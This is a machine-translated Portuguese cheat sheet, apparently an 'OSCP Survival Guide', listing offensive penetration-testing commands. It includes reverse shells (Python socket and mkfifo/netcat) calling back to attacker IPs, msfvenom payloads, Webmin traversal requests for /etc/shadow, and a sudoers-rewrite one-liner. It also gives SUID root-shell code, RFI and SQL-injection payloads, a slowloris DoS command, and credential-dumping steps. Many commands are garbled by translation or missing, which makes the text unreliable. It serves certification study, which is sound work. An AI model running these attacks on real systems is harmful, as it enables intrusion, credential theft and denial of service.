Escolar Documentos
Profissional Documentos
Cultura Documentos
3 DE NOVEMBRO DE 2018
OSCP-Survival-Guide
export ip = 192.168.1.100
Índice
Kali Linux
Port Scanning
Enumeração
Enumeração HTTP
Cartuchos
Transferências de arquivo
Escalonamento de privilégios
Ataques de cliente
Ataques na web
Ataques de senha
O Framework Metasploit
Kali Linux
Defina o endereço IP de destino para a variável do sistema$ip
export ip=192.168.1.100
locate sbd.exe
which sbd
Encontre uma busca por um arquivo que contém uma string específica em seu nome:
netstat -lntp
Mudar senha
passwd
Inicie um serviço
Pare um serviço
Descompacte um arquivo gz
gunzip access.log.gz
wget http://www.cisco.com
curl http://www.cisco.com
Manipulação de cordas
wc -l index.html
head index.html
tail index.html
grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
Use um loop bash para encontrar o endereço IP por trás de cada host
Baixe Netcat para Windows (útil para criar shells reversas e transferir arquivos em sistemas
Windows):https://joncraton.org/blog/46/netcat-for-windows/
nc -nlvp 4444
Alguns sistemas operacionais (OpenBSD) usarão nc.traditional em vez de nc, portanto, fique
atento a isso ...
whereis nc
ou
Ncat - Netcat para projeto Nmap que fornece mais segurança evita IDS
Wireshark
tcp.port eq 25 or icmp
Mostra apenas o tráfego na LAN (192.168.xx), entre estações de trabalho e servidores - sem
Internet:
ip.addr == xxx.xxx.xxx.xxx
É igual a
ip.addr != xxx.xxx.xxx.xxx
É igual a
Tcpdump
tcpdump -r passwordz.pcap
IPTables
```bash
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
```
site:microsoft.com
Inurl do Google
inurl:"level/15/sexec/-/show"
https://www.exploit-db.com/google-hacking-database/
https://www.ssllabs.com/ssltest/analyze.html
Coleta de Email
Simplesmente Email
Netcraft
https://searchdns.netcraft.com/
Enumeração Whois
whois domain-name-here.com
whois $ip
Agarrando Banner
nc -v $ip 25
telnet $ip 25
nc TARGET-IP 80
cd /opt/recon-ng
./recon-ng
show modules
help
Coleta de informações ativas
Port Scanning
/ 30 4 2 255.255.255.252 1/64
/ 29 8 6 255.255.255.248 1/32
/ 28 16 14 255.255.255.240 1/16
/ 27 32 30 255.255.255.224 1/8
/ 26 64 62 255.255.255.192 1/4
netdiscover
netdiscover -r $ip/24
nmap -O $ip
nmap $ip/24
Varredura de enumeração
Enumeração, escanear todas as portas TCP / UDP e enviar para um arquivo txt
Escaneamento rápido:
Traceroute rápido
Varredura intensa:
Verificação de ping
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or
(discovery and safe)" $ip/24
Faça a varredura com conexão ativa para eliminar quaisquer portas falsificadas projetadas para
enganá-lo
Enumeração
Enumeração DNS
Pesquisa de nomes de host DNS NMAP nmap -F --dns-server <dns server ip> <target ip range>
Pesquisa de host
host -t ns megacorpone.com
DNSEnum
dnsenum zonetransfer.me
NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
Enumeração SMB
Descoberta de SMB OS
nbtscan -r $ip/24
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or
fuzzer)' --script-args=unsafe=1 $ip
nmblookup -A $ip
enum4linux $ip
enum4linux -a $ip
ls -l /usr/share/nmap/scripts/smb*
OU
nc -nv $ip 25
Enumeração POP3 - Lendo e-mails de outras pessoas - Você pode encontrar nomes de usuário
e senhas para contas de e-mail, então aqui está como verificar o e-mail usando Telnet
USER billydean
+OK
PASS password
list
+OK 2 1807
1 786
2 1021
retr 1
From: jamesbrown@motown.com
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z
Corrija os valores de saída SNMP para que sejam legíveis por humanos
snmpenum -t $ip
Enumeração SNMPv3
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
`curl http://$ip:10000//unauthenticated/..
%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%
01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd`
Teste para ver se o webmin está rodando como root clicando em / etc / shadow
`curl http://$ip:10000//unauthenticated/..
%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%
01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow`
Enumeração Linux OS
cat /etc/issue
uname -a
ps -xaf
sudo -l
iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL
-t raw iptables -vL -t security
nome de anfitrião
usuários da rede
ipconfig / all
impressão de rota
arp -A
netstat -ano
net start
DRIVERQUERY
https://nmap.org/nsedoc/categories/exploit.html
cd /usr/share/nmap/scripts/ ls -l \*vuln\*
Pesquisa Nmap por meio de scripts Nmap para uma palavra-chave específica
https://nmap.org/nsedoc/categories/auth.html
https://nmap.org/nsedoc/categories/vuln.html
nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script
http-slowloris --script-args http-slowloris.runforever=true
Verificar vulnerabilidades de fusão a frio na web
Enumeração de arquivo
/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep
Aug
strings <filename>
file <filename>
Enumeração HTTP
Nikto
nikto -h $ip
Recurse nível 3
Enumeração de dedo
dedo @ $ ip
dedo batman @ $ ip
Esteganografia
apt-get update
openvas-setup
netstat -tulpn
Fuzzers Nmap:
https://nmap.org/nsedoc/categories/fuzzer.html
MSFvenom
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
Controlando EIP
locate pattern_create
pattern_create.rb -l 2700
locate pattern_offset
pattern_offset.rb -q 39694438
Use NASM para determinar o código HEX para uma instrução JMP ESP
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
Execute Mona na janela de registro de imunidade para encontrar o comando XEF (FFE4)
exe -o shell_reverse.exe
jmp eax
crash = “\ x41” * 4368 + “\ x97 \ x45 \ x13 \ x08” + “\ x83 \ xc0 \ x0c \ xff \ xe0 \ x90 \ x90”
msfvenom -p linux / x86 / shell_bind_tcp LPORT = 4444 -fc -b “\ x00 \ x0a \ x0d \ x20” –e x86 /
shikata_ga_nai
nc -v $ ip 4444
Cartuchos
nc -nlvp 4444
Gerando um Shell TTY - Saia da Jail ou shell limitado Você quase sempre deve atualizar seu
shell após assumir o controle de um usuário apache ou www.
(For example when you encounter an error message when trying to run an exploit sh: no job
control in this shell )
Você pode encontrar shells limitados que usam rbash e só permitem que você execute um
único comando por sessão. Você pode superar isso executando um shell SSH em seu host local:
export TERM=linux
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);
s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);'
echo os.system('/bin/bash')
/bin/sh -i
lua: os.execute('/bin/sh')
:set shell=/bin/bash:shell
De dentro do tcpdump
echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo
tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root
http://pentestmonkey.net/tools/web-shells/php-reverse-shel
http://pentestmonkey.net/tools/web-shells/php-findsock-shell
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
Navegador da web com PHP Shell b374k com upload de arquivo etc.
https://github.com/b374k/b374k
Linux
janelas
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port
to Connect On> -f exe > shell.exe
Mac
Payloads da Web
PHP
OU
Em seguida, precisamos adicionar o <? Php na primeira linha do arquivo para que ele seja
executado como uma página da web PHP:
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
JSP
GUERRA
Scripting Payloads
Pitão
Bash
Perl
Shellcode
Para todos os códigos de shell, consulte 'msfvenom –help-formatos' para informações sobre
parâmetros válidos. Msfvenom produzirá código que pode ser cortado e colado nesta
linguagem para seus exploits.
use exploit/multi/handler
exploit -j -z
Assim que os valores requeridos forem completados, o seguinte comando irá executar seu
manipulador - 'msfconsole -L -r'
use auxiliary/scanner/ssh/ssh_login
use post/multi/manage/shell_to_meterpreter
SBD.exe
sbd é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em
sistemas operacionais do tipo Unix e no Microsoft Win32. sbd apresenta criptografia AES-CBC-
128 + HMAC-SHA1 (por Christophe Devine), execução de programa (opção -e), escolha da
porta de origem, reconexão contínua com atraso e alguns outros recursos interessantes. sbd
suporta apenas comunicação TCP / IP. O sbd.exe (parte da distribuição Kali linux:
/usr/share/windows-binaries/backdoors/sbd.exe) pode ser carregado em uma caixa do
Windows como uma alternativa ao Netcat.
ssh -vvv
Transferências de arquivo
A pós-exploração refere-se às ações executadas por um invasor, uma vez que algum nível de
controle foi obtido em seu alvo.
python -m SimpleHTTPServer 80
Execute um servidor http Python3 básico, ótimo para servir shells etc.
python3 -m http.server
php -S $ ip: 80
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
Script de transferência de arquivos do Windows que pode ser colado na linha de comando. As
transferências de arquivos para uma máquina Windows podem ser complicadas sem um shell
Meterpreter. O script a seguir pode ser copiado e colado em uma janela reversa básica e usado
para transferir arquivos de um servidor da web (os comandos timeout 1 são necessários após
cada nova linha):
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
echo
C:\temp\cscript.exe webdl.vbs
HTTP Put
nmap -p80 $ ip –script http-put –script-args http-put.url = '/ test / sicpwn.php', http-put.file = '/
var / www / html / sicpwn.php
Carregando arquivos
SCP
Webdav com Davtest- Alguns administradores de sistema são gentis o suficiente para habilitar
o método PUT - Esta ferramenta fará o upload automático de um backdoor
https://github.com/cldrn/davtest
Você também pode fazer upload de um arquivo usando o método PUT com o comando curl:
E renomeie-o para um arquivo executável usando o método MOVE com o comando curl:
TFTP
mkdir / tftp
cp /usr/share/windows-binaries/nc.exe / tftp /
FTP
#! / bin / bash
groupadd ftpgroup
pure-pw mkdb
ln -s ../conf/PureDB 60pdb
mkdir -p / ftphome
/etc/init.d/pure-ftpd restart
Arquivos de embalagem
upx -9 nc.exe
exe2bat - Converte EXE em um arquivo de texto que pode ser copiado e colado,
localize exe2bat
git clonehttps://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion /
cd setup
setup.sh -c
Escalonamento de privilégios
A reutilização de senha é sua amiga. Os laboratórios OSCP são realistas, na forma como os
usuários reutilizam senhas em diferentes serviços e até em diferentes caixas. Mantenha uma
lista de senhas quebradas e teste-as nas novas máquinas que encontrar.
Guia de escalonamento de privilégios do Defacto Linux - Um guia muito mais completo para
enumeração de Linux:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Experimente o óbvio - talvez o usuário seja root ou possa fazer sudo para root:
id
sudo su
Aqui estão os comandos que aprendi a usar para realizar enumeração Linux e escalonamento
de privilégios:
Quais usuários podem fazer login nesta caixa (eles usam seu nome de usuário como senha) ?:
Qual versão do kernel estamos usando? Temos algum exploits de kernel para esta versão?
uname -a
netstat -tulpn
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the
owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user
who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user
who started it.
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
https://github.com/rebootuser/LinEnum
https://github.com/mzet-/linux-exploit-suggester
wget https://highon.coffee/downloads/linux-local-enum.sh
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://github.com/reider-roque/linpostexp
https://www.exploit-db.com/exploits/14814/
$ ./i-can-haz-modharden
# id
uid=0(root) gid=0(root)
https://www.exploit-db.com/exploits/15285/
CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 <3.2.2 (Gentoo / Ubuntu x86 / x64)
https://git.zx2c4.com/CVE-2012-0056/about/
./mempodipper
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
Existiu pela primeira vez em 2.6.22 (lançado em 2007) e foi corrigido em 18 de outubro de
2016
Freqüentemente, os arquivos binários SUID C são necessários para gerar um shell como um
superusuário, você pode atualizar o UID / GID e o shell conforme necessário.
abaixo estão alguns exemplos rápidos de copiar e colar para vários shells:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
For 32 bit:
Comando prático se você conseguir que um usuário root o execute. Adicione o usuário www-
data ao grupo Root SUDO sem necessidade de senha:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers &&
chmod 440 /etc/sudoers' > /tmp/update
Você pode descobrir que um comando está sendo executado pelo usuário root, você pode
modificar a variável de ambiente PATH do sistema para executar seu comando. No exemplo
abaixo, ssh é substituído por um SUID de shell reverso conectando-se a 10.10.10.1 na porta
4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >>
/tmp/ssh
chmod +x ssh
SearchSploit
searchsploit slmail
./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Exploits de kernel Linux pré-compilados - Muito útil se o GCC não estiver instalado na máquina
de destino!
https://www.kernel-exploits.com/
Experimente o óbvio - talvez o usuário seja SYSTEM ou já faça parte do grupo Administrador:
whoami
net user "%username%"
Tente o comando getsystem usando meterpreter - raramente funciona, mas vale a pena
tentar.
Copie e cole o seguinte conteúdo em seu shell remoto do Windows em Kali para gerar um
relatório rápido:
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
tasklist /SVC >> report.txt
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
timeout 1
dir "C:\"
timeout 1
timeout 1
timeout 1
dir "C:\Users\"
timeout 1
dir "C:\Users\Public\"
timeout 1
cadavar http://$ip
dav:/> exit
curl http://$ip/aspshell3.asp;.txt
[*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
mx11-080.exe -O XP
Powershell Exploits - você pode descobrir que alguns exploits de escalonamento de privilégios
do Windows são escritos no Powershell. Você pode não ter um shell interativo que permita
entrar no prompt do PowerShell. Depois que o script do PowerShell é carregado para o
servidor, aqui está uma linha rápida para executar um comando do PowerShell a partir de um
shell básico (cmd.exe):
MS16-032 https://www.exploit-db.com/exploits/39719/
Windows Run As - Alternar usuários no Linux é uma tarefa complicada com o comando. No
entanto, um comando equivalente não existe no Windows. Aqui estão três maneiras de
executar um comando como um usuário diferente no Windows.SU
Sysinternals psexec é uma ferramenta útil para executar um comando em um servidor remoto
ou local como um usuário específico, desde que você tenha seu nome de usuário e senha. O
exemplo a seguir cria um shell reverso de um servidor Windows para nossa caixa Kali usando
netcat para Windows e Psexec (em um sistema de 64 bits).
Runas.exe é uma ferramenta útil do Windows que permite que você execute um programa
como outro usuário, desde que você saiba sua senha. O exemplo a seguir cria um shell reverso
de um servidor Windows para nossa caixa Kali usando netcat para Windows e Runas.exe:
O PowerShell também pode ser usado para iniciar um processo como outro usuário. O
seguinte script PowerShell simples executará um shell reverso com o nome de usuário e senha
especificados.
icacls scsiaccess.exe
scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Everyone:(I)(F)
int i;
return 0;
dir /s Groups.xml
type Groups.xml
gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
Ataques de cliente
wget -O exploit.htmlhttp://www.exploit-db.com/download/24017
http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
Ataques na web
webshag-gui
Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/
OWASP Dirbuster
nikto -h $ ip
Adulteração de dados
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Impactos significativos de Cross Site Scripting (XSS) , como roubo de cookies e desvio de
autenticação, redirecionamento do navegador da vítima para uma página HTML maliciosa e
muito mais
<javascript>
</roteiro>
nc -nlvp 80
Vulnerabilidades de inclusão de arquivo
Vulnerabilidades de inclusão de arquivo local (LFI) e remoto (RFI) são comumente encontradas
em código PHP mal escrito.
fimap - Há uma ferramenta Python chamada fimap que pode ser aproveitada para automatizar
a exploração de vulnerabilidades LFI / RFI que são encontradas no PHP (sqlmap for LFI):
https://github.com/kurobeats/fimap
incluir($ _GET['página'].".php");
curl -s \
/ etc / issue
/ proc / version
/ etc / profile
/ etc / passwd
/ etc / passwd
/ etc / shadow
/root/.bash_history
% WINDIR% \ win.ini
% SYSTEMDRIVE% \ boot.ini
/ etc / fstab
/etc/master.passwd
/etc/resolv.conf
/ etc / sudoers
/etc/sysctl.conf
Inclusão de arquivo local - Nas versões do PHP abaixo de 5.3, podemos terminar com o byte
nulo
Para uma inclusão de arquivo remoto, procure o código php que não foi limpo e passado para
a função de inclusão do PHP e o arquivo php.ini deve ser configurado para permitir arquivos
remotos
include($_REQUEST["file"].".php");
http://192.168.11.35/addguestbook.php?
name=a&comment=b&LANG=http://192.168.10.5/evil.txt
http://sqlfiddle.com
http://rextester.com/l/mysql_online_compiler
Consulta Original
Valor de Injeção
Consulta Resultante
Consulta Original
Valor de Injeção
'-SLEEP(30); #
Consulta Resultante
Consulta Original
Valor de Injeção
'; SELECT pg_sleep(30); --
Consulta Resultante
use "Users"
show tables;
Bypass de autenticação
name='wronguser' or 1=1;
http://192.168.11.35/comment.php?id=738)'
http://$ip/comment.php?id=738 order by 1
Crie um backdoor
Rastreie os links
SQLMap Pesquisa por bancos de dados contra uma injeção GET SQL suspeita
Faça a varredura da url para união + injeção baseada em erro com o backend mysql e use um
agente de usuário aleatório + despejo de banco de dados
Consulta SQL
Exemplos NoSQLMap Você pode encontrar instâncias NoSQL como MongoDB em seus diários
OSCP ( ). NoSQLMap pode ajudá-lo a automatizar a enumeração NoSQLDatabase./cgi-
bin/mongo/2.2.3/dbparse.py
Instalação NoSQLMap
CD NoSQLMap /
ls
python nosqlmap.py
Frequentemente, você pode criar uma mensagem de despejo de exceção com MongoDB
usando uma NoSQLQuery malformada, como:
Ataques de senha
Descriptografia AES
http://aesencryption.net/
curl http: //$ ip/$ x.html | html2markdown | tr -s ' ' '\\ n' >> webapp.txt ; \
feito
CIRT
http://www.cirt.net/passwords
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevice
s.php
Virus.org
http://www.virus.org/default-password/
Senha padrão
http://www.defaultpassword.com/
Força bruta
https://nmap.org/nsedoc/categories/brute.html
Nmap Genérico com detecção automática de ataque de força bruta: nmap --script brute -Pn
<target.com or ip>
Arquivos de Dicionário
cd /usr/share/wordlists
crunch 8 8 -t ,@@^^%%%
permite executar vários ataques para obter senhas e hashes em texto claro. Uso: wce -w
Mimikatz
extraia senhas de texto simples, hash, código PIN e tíquetes Kerberos da memória. mimikatz
também pode executar passe-o-hash, passe-o-tíquete ou crie tíquetes Golden
meterpreter> msv
meterpreter> kerberos
Perfil de senha
cewl pode gerar uma lista de senhas a partir de uma página da web
Senha mutante
nano /etc/john/john.conf
Medusa
Ncrack
Hidra
Hydra SSH usando uma senha conhecida e uma lista de nome de usuário
https://crackstation.net/ http://finder.insidepro.com/
Hashcat necessário para instalar novos drivers para fazer meu GPU cracking funcionar na VM
linux Kali e também tive que usar o parâmetro –force.
3000 | LM | Operating-Systems
Crie um arquivo .hash com todos os hashes que você deseja quebrar puthasheshere.hash:
$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
Hashes de amostra
http://openwall.info/wiki/john/sample-hashes
Identificar Hashes
hash-identifier
john $ip.pwdump
Use o Metasploit para explorar um dos servidores SMB nos laboratórios. Despeje os hashes de
senha e tente um ataque pass-the-hash contra outro sistema:
export
SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
cat /etc/rinetd.conf
w.x.y.z 53 a.b.c.d 80
Encaminhamento de porta remota SSH: Adequado para abrir um shell remoto em uma rede
interna não roteável
SSH Dynamic Port Forwarding: crie um proxy SOCKS4 em nossa caixa de ataque local para
encapsular TODO o tráfego de entrada para QUALQUER host na rede DMZ em QUALQUER
PORTA
Túnel HTTP
túnel http
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
Tunnel Remote Desktop (RDP) de uma máquina Windows popped para a sua rede
Túnel na porta 22
Tunnel Remote Desktop (RDP) de uma janela popped usando HTTP Tunnel (ignorar a inspeção
profunda de pacotes)
httptunnel_client.exe
VLAN Hopping
./frogger.sh
Hacking VPN
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset
="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-
207-134key
Hacking PPTP
SSH Pivoting
Tunelamento DNS
dnscat2 suporta os comandos “download” e “upload” para obter arquivos (dados e programas)
de e para a máquina de destino.
apt-get update
CD dnscat2 / servidor
pacote de instalação
Execute dnscat2:
ruby ./dnscat2.rb
Máquina Alvo:
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
O Framework Metasploit
https://github.com/rapid7/metasploit-framework
Metasploit
Sintaxe MSF
Iniciar metasploit
msfconsole
msfconsole -q
show -h
show auxiliary
Use um módulo
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
info
show options
set THREADS 10
Execute o módulo
run
Execute um Exploit
exploit
Procure um módulo
hosts
db_nmap
services -p 443
Aproveite o banco de dados MSF para verificar as portas SMB (rhosts preenchidos
automaticamente)
Carga útil não preparada - é uma carga que é enviada em sua totalidade de uma vez
Preparado - enviado em duas partes Não tem espaço de buffer suficiente Ou precisa ignorar o
antivírus
MS 17-010 - EternalBlue
Você pode encontrar algumas caixas que são vulneráveis ao MS17-010 (também conhecido
como EternalBlue). Embora não seja oficialmente parte do curso indended, esta exploração
pode ser aproveitada para obter acesso de nível de SISTEMA a uma caixa do Windows. Nunca
tive muita sorte usando o módulo integrado Metasploit EternalBlue. Descobri que a versão
onze caminhos funciona de maneira muito mais relábil. Aqui estão as instruções para instalá-lo
retiradas do seguinte vídeo do YouTube: https://www.youtube.com/watch?v=4OHLor9VaRI
dpkg –add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~ / .wine wine
cmd.exe sair
Descobri que usar spoolsv.exe como PROCESSINJECT produzia resultados em caixas OSCP.
sysinfo
Obtenha o ID do usuário do Meterpreter Shell
getuid
Procure um arquivo
search -f *pass*.txt
Enviar um arquivo
Baixe um arquivo
shell
exit
payload
use exploit/multi/handler
exploit
mkdir -p ~/.msf4/modules/exploits/linux/misc
CD ~/.msf4/modules/exploits/linux/misc
nano crossfire.rb
upload
portfwd
route
keyscan_start
keyscan_stop
screenshot
record_mic
webcam_snap
getsystem
hashdump
background
cp /usr/share/windows-binaries/Hyperion-1.0.zip
descompacte Hyperion-1.0.zip
CD Hyperion-1.0 /
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .